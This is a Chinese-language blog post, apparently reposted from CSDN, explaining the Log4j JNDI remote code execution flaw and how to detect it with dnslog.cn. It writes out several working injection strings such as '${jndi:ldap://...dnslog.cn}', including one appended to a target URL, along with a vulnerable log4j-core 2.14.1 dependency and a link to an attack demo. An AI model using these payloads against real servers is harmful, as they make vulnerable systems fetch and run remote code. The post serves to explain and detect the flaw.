log4j RCE漏洞原理分析及检测

发布时间:2024年01月03日

实现原理

log4j支持使用表达式的形式打印日志,比如

logger.info("system propety: ${sys:user.dir}");

问题就在与表达式支持非常多样,其中有一个jndi就是今天的主题

logger.info("system propety: ${jndi:schema://url}");

jdk将从url指定的路径下载一段字节流,并将其反序列化为Java对象,作为jndi返回。反序列化过程中,即会执行字节流中包含的程序。

因此,如果攻击者能够控制日志打印的内容,就可以使目标服务器从攻击者指定的任意url地址下载代码字节流,攻击者在字节流中附带的代码就会在目标服务器上执行。

那么问题来了,攻击者如何控制服务器上记录的日志内容呢?

非常简单! 大部分web服务程序都会对用户输入进行日志记录。例如:用户访问了哪些url,有哪些关键的输入等,都会被作为参数送到log4j中,我们在这些地方写上 ${jndi:ldap://http://xxx.dnslog.cn} 就可以使web服务从http://xxx.dnslog.cn下载字节流了。

12月9日晚,漏洞刚爆出时,在百度、google的搜索框内输入攻击字符串,就可以进行攻击。不提供输入框也好办,在url中随便附上一段也可能成功: www.target.com?${jndi:schema://url}

现在各大网站都已经完成了紧急修复工作,比如在taobao上尝试探测,会被ali的waf阻拦。

漏洞检测

漏洞检测可以使用 http://www.dnslog.cn/ 协助进行。 dnslog.cn 是安全检测常用工具之一,在其主页上点击 Get SubDomain 即可以自动生成一个 dnslog.cn 的子域名,这个子域名解析出来的ip是 127.0.0.1,也就是本机地址。

漏洞检测时,可以使用 ${jndi:ldap://http://xxx.dnslog.cn} ,如果攻击成功,目标服务器将会从 xxx.dnslog.cn 下载jndi字节流,下载之前首先得连接dnslog.cn进行xxx.dnslog.cn的域名解析,获得真实ip地址。dnslog.cn 会将所有dns解析记录显示在网站上,点击refresh即可看到。

攻击检测后,如果发现 dnslog.cn 中刷新到了dns解析记录,就表示探测成功。

private static final Logger LOG = LogManager.getLogger(Application.class);
LOG.info("${jndi:ldap://i3sicw.dnslog.cn}");

如果使用的log4j版本小于2.15就会复现

<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-core</artifactId>
    <version>2.14.1</version>
</dependency>

一个检测demo

https://gitee.com/ziy001/log4j-attack

运行后会在本机弹出计算器,说明客户端通过这个漏洞让服务端执行了某些代码。

文章来源:https://blog.csdn.net/qq32933432/article/details/135365345
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。